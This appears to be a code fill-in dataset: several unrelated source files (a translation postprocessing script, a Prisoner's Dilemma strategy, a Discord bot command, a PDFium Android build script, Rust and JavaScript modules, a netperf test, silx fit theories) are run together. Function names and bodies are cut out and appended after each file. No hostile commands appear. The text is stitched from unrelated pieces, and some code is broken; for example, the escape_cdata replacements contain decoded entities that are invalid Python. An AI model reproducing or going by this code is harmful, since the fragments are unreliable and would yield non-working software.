filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
        # if diff reduction was requested, replace some XML to 'sanitize' it to Qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations() | import subprocess
import re |
algo_mdo_tit_for_2_tat.py | # Author: Mark Olson 2021-11-06 https://github.com/Mark-MDO47/PrisonDilemmaTourney
#
# algo_mdo_tit_for_2_tat.py - Prisoner's Dilemma tournament algorithm file
#
# The algo_mdo_tit_for_2_tat algorithm behaves as follows:
# On the first two moves it returns choices.COOPERATE
# On all subsequent moves:
# if the opponent did choices.DEFECT within the last two moves, it returns choices.DEFECT this move
# else it returns choices.COOPERATE this move
#
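# Illustrative (hypothetical) opponent histories, latest move first:
#   oppHist = [choices.COOPERATE, choices.DEFECT]    -> a DEFECT within the last two moves -> returns choices.DEFECT
#   oppHist = [choices.COOPERATE, choices.COOPERATE] -> no recent DEFECT                   -> returns choices.COOPERATE
#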
# For an algorithm python routine in a file (i.e. with filename algo_mdo_something.py), the calling sequence is
# algo_mdo_something(selfHist, oppHist, ID))
# I recommend adding your initials (mine are mdo) to your file/algorithm name so we don't have name collisions
# NOTE that the function name is the same as the python filename with the *.py removed
# This file is named algo_mdo_tit_for_2_tat.py so the function name is algo_mdo_tit_for_2_tat
# Each call to the algorithm will have the following for parameters:
#     history lists of all the choices made by both parties in reverse order (latest choice before this is [0], prev [1])
#     Thus the opponent's choice made in the previous move, assuming this isn't the first move, is oppHist[0].
#         if len(oppHist) > 0, there was at least one prior move.
#         note: len(oppHist) should be identical to len(selfHist)
# value of each entry in xxxHist is one of choices.DEFECT or choices.COOPERATE
#
# The algorithm will return
# choices.DEFECT or choices.COOPERATE
#
# See https://en.wikipedia.org/wiki/Prisoner%27s_dilemma
# See https://cs.stanford.edu/people/eroberts/courses/soco/projects/1998-99/game-theory/axelrod.html
#
# Merrill Flood and Melvin Dresher from RAND corporation framed the concept in 1950 to show why two completely rational
# individuals might not cooperate, even if it appears that it is in their best interests to do so.
#
# There are many scenarios that can be mapped to this concept, but the famous mapping by Albert W. Tucker called the
# "Prisoner's Dilemma" revolves around two prisoners, "A" and "B", guilty of the same crime and being held in
# separate interrogation rooms.
#
# Due to weak evidence held by the police, if both cooperate (do not betray the other), that will lead to a small sentence
# for each of them. If one cooperates and the other defects, the defector gets off free and the cooperator gets a
# large sentence. If they both defect, they both get an intermediate sentence.
# (spoiler alert) If the game is played exactly one time, the game-theory best choice for each player is to
# defect (or betray the other player).
#
# Robert Axelrod, professor of political science at the University of Michigan, held a tournament of competing
# strategies for the famous Prisoner's Dilemma in 1980.
#
# He had the insight that if the game is played many times in succession, then the history of play allows each player
# to take into account the "reputation" of the other player in making their choice of behavior.
# He invited some game theorists to submit algorithms that would be competed against each other in a computer tournament.
# Later he held another tournament and invited anyone to submit algorithms.
# The "Tit-For-Tat" algorithm seemed to do the best.
import sys
import PrisonersDilemmaTournament as choices # pick up choices.DEFECT and choices.COOPERATE
# The algo_mdo_tit_for_2_tat algorithm behaves as follows:
# On the first two moves it returns choices.COOPERATE
# On all subsequent moves:
# if the opponent did choices.DEFECT in the last two moves, we return choices.DEFECT this move
# else we return choices.COOPERATE this move
#
# note: the function name should be exactly the same as the filename but without the ".py"
# note: len(selfHist) and len(oppHist) should always be the same
#
def | (selfHist, oppHist, ID):
if len(selfHist) <= 1: # first two moves
return choices.COOPERATE
else:
if (choices.DEFECT == oppHist[1]) or (choices.DEFECT == oppHist[0]):
return choices.DEFECT
else:
return oppHist[0]
if __name__ == "__main__":
sys.stderr.write("ERROR - algo_mdo_tit_for_2_tat.py is not intended to be run stand-alone\n")
exit(-1)
| algo_mdo_tit_for_2_tat |
Link.js | import Character from "../../database/models/Character";
import Submission from "../../database/models/Submission";
import { Command } from "karasu";
import fs from "fs";
import path from "path";
export default class LinkCommand extends Command {
constructor(bot) {
super(bot, "link", {
description: "link-desc",
subCommands: [
new VerifyCommand(bot),
new DumpCommand(bot),
new LoadCommand(bot)
],
category: "anime"
});
}
run() {
return ["link-link", { url: `${process.env.HOST_URL}/crowdsource` }];
}
}
class | extends Command {
constructor(bot) {
super(bot, "verify", {
description: "link-verify-desc",
ownerOnly: true
});
}
async run(msg, _, __, respond) {
for (; ;) {
const submission = await Submission.random();
if (!submission) return ["link-empty-backlog"];
const character = await Character.findOne({ anidb_id: submission.anidb_id });
const user = this.bot.users.find(user => user.id === submission.user_id);
await msg.channel.createMessage({
embed: {
title: `${character.name} from ${character.animes.map(a => a.title).join(", ")}`,
image: {
url: character.photos[0]
},
footer: {
icon_url: user.avatarURL,
text: `Submitted by ${user.username}#${user.discriminator}`
}
}
});
await msg.channel.createMessage(`https://myanimelist.net/character/${submission.mal_id}`);
let response = await this.bot.collectorManager.awaitMessages({
limit: 1,
timeout: 120000,
filter: m => m.author.id === msg.author.id && m.channel.id === msg.channel.id
});
if (response) {
response = response.content;
if (response === "ok") {
character.mal_id = submission.mal_id;
} else if (response === "skip") {
continue;
} else if (response === "exit") {
msg.channel.createMessage("Ending");
break;
} else if (response !== "clear") {
break;
}
await Submission.findByIdAndDelete(submission._id);
const newDoc = await character.save();
respond(["link-linked", { name: newDoc.name, id: newDoc.mal_id }]);
} else {
break;
}
}
}
}
const dumpFile = "../../../cache/dump.js";
class DumpCommand extends Command {
constructor(bot) {
super(bot, "dump", {
description: "link-dump-desc",
ownerOnly: true
});
}
async run() {
const characters = await Character.find({ mal_id: { $exists: true } });
const links = characters.map(c => [c.anidb_id[0], c.mal_id]);
const content = `export const links = ${JSON.stringify(links)};`;
fs.writeFileSync(path.join(__dirname, dumpFile), content);
return ["link-dumped", { characters: characters.length }];
}
}
class LoadCommand extends Command {
constructor(bot) {
super(bot, "load", {
description: "link-load-desc",
ownerOnly: true
});
}
async run() {
delete require.cache[require.resolve(dumpFile)];
const { links } = require(dumpFile);
for (const link of links) {
await Character.findOneAndUpdate({ anidb_id: link[0] }, { mal_id: link[1] });
}
return ["link-loaded", { characters: links.length }];
}
} | VerifyCommand |
android.py | import glob
import os
import tarfile
from subprocess import check_call
import modules.config as c
import modules.functions as f
def run_task_build_pdfium():
f.debug("Building PDFium...")
target = "android"
build_dir = os.path.join("build", target)
f.create_dir(build_dir)
target_dir = os.path.join(build_dir, "pdfium")
f.remove_dir(target_dir)
cwd = build_dir
command = " ".join(
[
"gclient",
"config",
"--unmanaged",
"https://pdfium.googlesource.com/pdfium.git",
]
)
check_call(command, cwd=cwd, shell=True)
gclient_file = os.path.join(build_dir, ".gclient")
f.append_to_file(gclient_file, "target_os = [ 'android' ]")
cwd = build_dir
command = " ".join(["gclient", "sync"])
check_call(command, cwd=cwd, shell=True)
cwd = target_dir
command = " ".join(["git", "checkout", c.pdfium_git_commit])
check_call(command, cwd=cwd, shell=True)
def run_task_patch():
f.debug("Patching...")
source_dir = os.path.join("build", "android", "pdfium")
# build gn
source_file = os.path.join(
source_dir,
"BUILD.gn",
)
if f.file_line_has_content(source_file, 25, " ]\n"):
f.replace_line_in_file(source_file, 25, ' "FPDFSDK_EXPORTS",\n ]\n')
f.debug("Applied: Build GN")
else:
f.debug("Skipped: Build GN")
# build gn flags
source_file = os.path.join(
source_dir,
"BUILD.gn",
)
if f.file_line_has_content(source_file, 19, " cflags = []\n"):
f.replace_line_in_file(
source_file, 19, ' cflags = [ "-fvisibility=default" ]\n'
)
f.debug("Applied: Build GN Flags")
else:
f.debug("Skipped: Build GN Flags")
pass
def run_task_build():
f.debug("Building libraries...")
current_dir = os.getcwd()
# configs
for config in c.configurations_android:
# targets
for target in c.targets_android:
main_dir = os.path.join(
"build",
target["target_os"],
"pdfium",
"out",
"{0}-{1}-{2}".format(target["target_os"], target["target_cpu"], config),
)
f.remove_dir(main_dir)
f.create_dir(main_dir)
os.chdir(
os.path.join(
"build",
target["target_os"],
"pdfium",
)
)
# generating files...
f.debug(
'Generating files to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
arg_is_debug = "true" if config == "debug" else "false"
args = []
args.append('target_os="{0}"'.format(target["pdfium_os"]))
args.append('target_cpu="{0}"'.format(target["target_cpu"]))
args.append("use_goma=false")
args.append("is_debug={0}".format(arg_is_debug))
args.append("pdf_use_skia=false")
args.append("pdf_use_skia_paths=false")
args.append("pdf_enable_xfa=false")
args.append("pdf_enable_v8=false")
args.append("is_component_build=true")
args.append("pdf_is_standalone=true")
args.append("pdf_bundle_freetype=true")
if config == "release":
args.append("symbol_level=0")
args_str = " ".join(args)
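            # For illustration (hypothetical arch and config values), the generated
            # command looks roughly like:
            #   gn gen out/android-arm-release --args='target_os="android" target_cpu="arm" use_goma=false is_debug=false ...'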
command = " ".join(
[
"gn",
"gen",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"--args='{0}'".format(args_str),
]
)
check_call(command, shell=True)
# compiling...
f.debug(
'Compiling to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
command = " ".join(
[
"ninja",
"-C",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"pdfium",
"-v",
]
)
check_call(command, shell=True)
os.chdir(current_dir)
def run_task_install():
f.debug("Installing libraries...")
# configs
for config in c.configurations_android:
f.remove_dir(os.path.join("build", "android", config))
f.create_dir(os.path.join("build", "android", config))
# targets
for target in c.targets_android:
out_dir = "{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
)
source_lib_dir = os.path.join("build", "android", "pdfium", "out", out_dir)
lib_dir = os.path.join("build", "android", config, "lib")
target_dir = os.path.join(lib_dir, target["android_cpu"])
f.remove_dir(target_dir)
f.create_dir(target_dir)
for basename in os.listdir(source_lib_dir):
if basename.endswith(".so"):
pathname = os.path.join(source_lib_dir, basename)
if os.path.isfile(pathname):
f.copy_file2(pathname, target_dir)
# include
include_dir = os.path.join("build", "android", "pdfium", "public")
target_include_dir = os.path.join("build", "android", config, "include")
f.remove_dir(target_include_dir)
f.create_dir(target_include_dir)
for basename in os.listdir(include_dir):
if basename.endswith(".h"):
pathname = os.path.join(include_dir, basename)
if os.path.isfile(pathname):
f.copy_file2(pathname, target_include_dir)
def | ():
f.debug("Testing...")
for config in c.configurations_android:
for target in c.targets_android:
lib_dir = os.path.join(
"build", "android", config, "lib", target["android_cpu"]
)
command = " ".join(["file", os.path.join(lib_dir, "libpdfium.so")])
check_call(command, shell=True)
def run_task_archive():
f.debug("Archiving...")
current_dir = os.getcwd()
lib_dir = os.path.join(current_dir, "build", "android")
output_filename = os.path.join(current_dir, "android.tgz")
tar = tarfile.open(output_filename, "w:gz")
for configuration in c.configurations_android:
tar.add(
name=os.path.join(lib_dir, configuration),
arcname=os.path.basename(os.path.join(lib_dir, configuration)),
filter=lambda x: (
None
if "_" in x.name
and not x.name.endswith(".h")
and not x.name.endswith(".so")
and os.path.isfile(x.name)
else x
),
)
tar.close()
| run_task_test |
index_sparse.rs | // Copyright 2021 Datafuse Labs.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::collections::HashMap;
use common_datablocks::DataBlock;
use common_datavalues2::DataValue;
use common_exception::Result;
use common_planners::Expression;
use crate::storages::index::IndexSchemaVersion;
#[derive(Clone, Debug, PartialEq, serde::Serialize, serde::Deserialize)]
pub struct SparseIndexValue {
// Min value of this granule.
pub min: DataValue,
// Max value of this granule.
pub max: DataValue,
// The page number to read in the data file.
pub page_no: i64,
}
/// Sparse index.
#[derive(Clone, Debug, PartialEq, serde::Serialize, serde::Deserialize)]
pub struct SparseIndex {
pub col: String,
// Sparse index.
pub values: Vec<SparseIndexValue>,
// Version.
pub version: IndexSchemaVersion,
}
#[allow(dead_code)]
impl SparseIndex {
fn create(col: String) -> Self {
SparseIndex {
col, |
pub fn typ(&self) -> &str {
"sparse"
}
// Push one sparse value to the sparse index.
pub fn push(&mut self, val: SparseIndexValue) -> Result<()> {
self.values.push(val);
Ok(())
}
pub fn create_index(keys: &[String], blocks: &[DataBlock]) -> Result<Vec<SparseIndex>> {
let mut keys_idx = vec![];
for key in keys {
let mut sparse = SparseIndex::create(key.clone());
for (page_no, page) in blocks.iter().enumerate() {
let min = page.first(key.as_str())?;
let max = page.last(key.as_str())?;
sparse.push(SparseIndexValue {
min,
max,
page_no: page_no as i64,
})?;
}
keys_idx.push(sparse);
}
Ok(keys_idx)
}
/// Apply the index and get the result:
    /// (true, ...) : need to read the whole file
/// (false, [0, 3]) : need to read the page-0 and page-3 only.
pub fn apply_index(
_idx_map: HashMap<String, SparseIndex>,
_expr: &Expression,
) -> Result<(bool, Vec<i64>)> {
// TODO(bohu): expression check.
Ok((true, vec![]))
}
} | values: vec![],
version: IndexSchemaVersion::V1,
}
} |
CgAlbum.esm.js | // THIS FILE IS AUTO GENERATED
import { GenIcon } from '../lib';
export function | (props) {
return GenIcon({"tag":"svg","attr":{"viewBox":"0 0 24 24","fill":"none"},"child":[{"tag":"path","attr":{"fillRule":"evenodd","clipRule":"evenodd","d":"M2 19C2 20.6569 3.34315 22 5 22H19C20.6569 22 22 20.6569 22 19V5C22 3.34315 20.6569 2 19 2H5C3.34315 2 2 3.34315 2 5V19ZM20 19C20 19.5523 19.5523 20 19 20H5C4.44772 20 4 19.5523 4 19V5C4 4.44772 4.44772 4 5 4H10V12.0111L12.395 12.0112L14.0001 9.86419L15.6051 12.0112H18.0001L18 4H19C19.5523 4 20 4.44772 20 5V19ZM16 4H12V9.33585L14.0001 6.66046L16 9.33571V4Z","fill":"currentColor"}}]})(props);
};
| CgAlbum |
cli.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import sys, os
from pathlib import Path
import qlib
import fire
import pandas as pd
import ruamel.yaml as yaml
from qlib.config import C
from qlib.model.trainer import task_train
def get_path_list(path):
|
def sys_config(config, config_path):
"""
Configure the `sys` section
Parameters
----------
config : dict
configuration of the workflow.
config_path : str
path of the configuration
"""
sys_config = config.get("sys", {})
# abspath
for p in get_path_list(sys_config.get("path", [])):
sys.path.append(p)
# relative path to config path
for p in get_path_list(sys_config.get("rel_path", [])):
sys.path.append(str(Path(config_path).parent.resolve().absolute() / p))
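# A minimal sketch of the optional `sys` section consumed above (the paths shown
# are purely illustrative):
#
#   sys:
#     path: ["/abs/path/to/extra/modules"]
#     rel_path: ["../custom_code"]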
# workflow handler function
def workflow(config_path, experiment_name="workflow", uri_folder="mlruns"):
with open(config_path) as fp:
config = yaml.load(fp, Loader=yaml.SafeLoader)
# config the `sys` section
sys_config(config, config_path)
exp_manager = C["exp_manager"]
exp_manager["kwargs"]["uri"] = "file:" + str(Path(os.getcwd()).resolve() / uri_folder)
qlib.init(**config.get("qlib_init"), exp_manager=exp_manager)
task_train(config.get("task"), experiment_name=experiment_name)
# function to run workflow by config
def run():
fire.Fire(workflow)
if __name__ == "__main__":
run()
| if isinstance(path, str):
return [path]
else:
return [p for p in path] |
constants.ts | export const CFGREDUCTION_REQUEST = 'CFGREDUCTION_REQUEST';
export const CFGREDUCTION_SUCCESS = 'CFGREDUCTION_SUCCESS';
export const CFGREDUCTION_CANCEL = 'CFGREDUCTION_CANCEL';
export const CFGREDUCTION_FAIL = 'CFGREDUCTION_FAIL'; | ||
csv_analys.go | package main
import (
"bufio"
"fmt"
"os"
"strings"
)
func main3() | {
uidVerFile := "I:\\test\\logs\\版本活跃用户810.csv"
uidSet := make(map[string]bool, 150000)
if uidVer, err := os.OpenFile(uidVerFile, os.O_RDONLY, os.ModePerm); err == nil {
br := bufio.NewReader(uidVer)
_, _ = br.ReadBytes('\n')
for {
l, e := br.ReadBytes('\n')
if e != nil && len(l) == 0 {
break
}
line := string(l)
lineData := strings.Split(line, ",")
uid, ver := lineData[0], lineData[1]
if ver == "6.3" || ver == "6.3.1" || ver == "6.3.2" {
uidSet[uid] = true
}
}
fmt.Println(len(uidSet))
}
rfmFilePath := "I:\\test\\logs\\分层模型用户数据报表_810.csv"
if rfm, err := os.OpenFile(rfmFilePath, os.O_RDONLY, os.ModePerm); err == nil {
br := bufio.NewReader(rfm)
_, _ = br.ReadBytes('\n')
tMapCount := make(map[string]int)
for {
l, e := br.ReadBytes('\n')
if e != nil && len(l) == 0 {
break
}
line := string(l)
lineData := strings.Split(line, ",")
uid, t := lineData[2], lineData[9]
if uidSet[uid] {
tMapCount[t]++
}
}
fmt.Println(tMapCount)
}
}
|
|
netperf_rfc2544.py | # Copyright (c) 2015
#
# All rights reserved.
#
# This file is distributed under the Clear BSD license.
# The full text can be found in LICENSE in the root directory.
from boardfarm.devices import prompt
from boardfarm.tests import rootfs_boot
class NetperfRFC2544(rootfs_boot.RootFSBootTest):
| '''Single test to simulate RFC2544'''
def runTest(self):
board = self.dev.board
lan = self.dev.lan
for sz in ["74", "128", "256", "512", "1024", "1280", "1518"]:
print("running %s UDP test" % sz)
lan.sendline(
'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz)
lan.expect_exact(
'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz)
lan.expect('UDP UNIDIRECTIONAL')
lan.expect(prompt, timeout=90)
board.sendline()
board.expect(prompt) |
|
system_ime.rs | use crate::avm1::activation::Activation;
use crate::avm1::error::Error;
use crate::avm1::listeners::Listeners;
use crate::avm1::object::Object;
use crate::avm1::property::Attribute;
use crate::avm1::property::Attribute::{DontDelete, DontEnum, ReadOnly};
use crate::avm1::{ScriptObject, TObject, Value};
use crate::context::UpdateContext;
use gc_arena::MutationContext;
use std::convert::Into;
fn on_ime_composition<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> |
fn do_conversion<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(true.into())
}
fn get_conversion_mode<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok("KOREAN".into())
}
fn get_enabled<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
fn set_composition_string<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
fn set_conversion_mode<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
fn set_enabled<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
pub fn create<'gc>(
gc_context: MutationContext<'gc, '_>,
proto: Option<Object<'gc>>,
fn_proto: Option<Object<'gc>>,
listener: &Listeners<'gc>,
) -> Object<'gc> {
let mut ime = ScriptObject::object(gc_context, proto);
register_listener!(gc_context, ime, listener, fn_proto, ime);
ime.define_value(
gc_context,
"ALPHANUMERIC_FULL",
"ALPHANUMERIC_FULL".into(),
Attribute::DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"ALPHANUMERIC_HALF",
"ALPHANUMERIC_HALF".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"CHINESE",
"CHINESE".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"JAPANESE_HIRAGANA",
"JAPANESE_HIRAGANA".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"JAPANESE_KATAKANA_FULL",
"JAPANESE_KATAKANA_FULL".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"KOREAN",
"KOREAN".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"UNKNOWN",
"UNKNOWN".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.force_set_function(
"onIMEComposition",
on_ime_composition,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"doConversion",
do_conversion,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"getConversionMode",
get_conversion_mode,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"getEnabled",
get_enabled,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"setCompositionString",
set_composition_string,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"setConversionMode",
set_conversion_mode,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"setEnabled",
set_enabled,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.into()
}
| {
Ok(false.into())
} |
fittheories.py | # coding: utf-8
#/*##########################################################################
#
# Copyright (c) 2004-2020 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
########################################################################### */
"""This modules provides a set of fit functions and associated
estimation functions in a format that can be imported into a
:class:`silx.math.fit.FitManager` instance.
These functions are well suited for fitting multiple gaussian shaped peaks
typically found in spectroscopy data. The estimation functions are designed
to detect how many peaks are present in the data, and provide an initial
estimate for their height, their center location and their full-width
at half maximum (fwhm).
The limitation of these estimation algorithms is that only gaussians having a
similar fwhm can be detected by the peak search algorithm.
This *search fwhm* can be defined by the user, if
he knows the characteristics of his data, or can be automatically estimated
based on the fwhm of the largest peak in the data.
The source code of this module can serve as template for defining your own
fit functions.
The functions to be imported by :meth:`FitManager.loadtheories` are defined by
a dictionary :const:`THEORY`: with the following structure::
from silx.math.fit.fittheory import FitTheory
THEORY = {
'theory_name_1': FitTheory(
description='Description of theory 1',
function=fitfunction1,
parameters=('param name 1', 'param name 2', …),
estimate=estimation_function1,
configure=configuration_function1,
derivative=derivative_function1),
'theory_name_2': FitTheory(…),
}
.. note::
Consider using an OrderedDict instead of a regular dictionary, when
defining your own theory dictionary, if the order matters to you.
This will likely be the case if you intend to load a selection of
functions in a GUI such as :class:`silx.gui.fit.FitManager`.
Theory names can be customized (e.g. ``gauss, lorentz, splitgauss``…).
The mandatory parameters for :class:`FitTheory` are ``function`` and
``parameters``.
You can also define an ``INIT`` function that will be executed by
:meth:`FitManager.loadtheories`.
See the documentation of :class:`silx.math.fit.fittheory.FitTheory`
for more information.
Module members:
---------------
"""
import numpy
from collections import OrderedDict
import logging
from silx.math.fit import functions
from silx.math.fit.peaks import peak_search, guess_fwhm
from silx.math.fit.filters import strip, savitsky_golay
from silx.math.fit.leastsq import leastsq
from silx.math.fit.fittheory import FitTheory
_logger = logging.getLogger(__name__)
__authors__ = ["V.A. Sole", "P. Knobel"]
__license__ = "MIT"
__date__ = "15/05/2017"
DEFAULT_CONFIG = {
'NoConstraintsFlag': False,
'PositiveFwhmFlag': True,
'PositiveHeightAreaFlag': True,
'SameFwhmFlag': False,
'QuotedPositionFlag': False, # peak not outside data range
'QuotedEtaFlag': False, # force 0 < eta < 1
# Peak detection
'AutoScaling': False,
'Yscaling': 1.0,
'FwhmPoints': 8,
'AutoFwhm': True,
'Sensitivity': 2.5,
'ForcePeakPresence': True,
# Hypermet
'HypermetTails': 15,
'QuotedFwhmFlag': 0,
'MaxFwhm2InputRatio': 1.5,
'MinFwhm2InputRatio': 0.4,
# short tail parameters
'MinGaussArea4ShortTail': 50000.,
'InitialShortTailAreaRatio': 0.050,
'MaxShortTailAreaRatio': 0.100,
'MinShortTailAreaRatio': 0.0010,
'InitialShortTailSlopeRatio': 0.70,
'MaxShortTailSlopeRatio': 2.00,
'MinShortTailSlopeRatio': 0.50,
# long tail parameters
'MinGaussArea4LongTail': 1000.0,
'InitialLongTailAreaRatio': 0.050,
'MaxLongTailAreaRatio': 0.300,
'MinLongTailAreaRatio': 0.010,
'InitialLongTailSlopeRatio': 20.0,
'MaxLongTailSlopeRatio': 50.0,
'MinLongTailSlopeRatio': 5.0,
# step tail
'MinGaussHeight4StepTail': 5000.,
'InitialStepTailHeightRatio': 0.002,
'MaxStepTailHeightRatio': 0.0100,
'MinStepTailHeightRatio': 0.0001,
# Hypermet constraints
# position in range [estimated position +- estimated fwhm/2]
'HypermetQuotedPositionFlag': True,
'DeltaPositionFwhmUnits': 0.5,
'SameSlopeRatioFlag': 1,
'SameAreaRatioFlag': 1,
# Strip bg removal
'StripBackgroundFlag': True,
'SmoothingFlag': True,
'SmoothingWidth': 5,
'StripWidth': 2,
'StripIterations': 5000,
'StripThresholdFactor': 1.0}
"""This dictionary defines default configuration parameters that have effects
on fit functions and estimation functions, mainly on fit constraints.
This dictionary is accessible as attribute :attr:`FitTheories.config`,
which can be modified by configuration functions defined in
:const:`CONFIGURE`.
"""
CFREE = 0
CPOSITIVE = 1
CQUOTED = 2
CFIXED = 3
CFACTOR = 4
CDELTA = 5
CSUM = 6
CIGNORED = 7
class FitTheories(object):
"""Cla | uns = FitTheories()
THEORY = OrderedDict((
('Gaussians',
FitTheory(description='Gaussian functions',
function=functions.sum_gauss,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_height_position_fwhm,
configure=fitfuns.configure)),
('Lorentz',
FitTheory(description='Lorentzian functions',
function=functions.sum_lorentz,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_height_position_fwhm,
configure=fitfuns.configure)),
('Area Gaussians',
FitTheory(description='Gaussian functions (area)',
function=functions.sum_agauss,
parameters=('Area', 'Position', 'FWHM'),
estimate=fitfuns.estimate_agauss,
configure=fitfuns.configure)),
('Area Lorentz',
FitTheory(description='Lorentzian functions (area)',
function=functions.sum_alorentz,
parameters=('Area', 'Position', 'FWHM'),
estimate=fitfuns.estimate_alorentz,
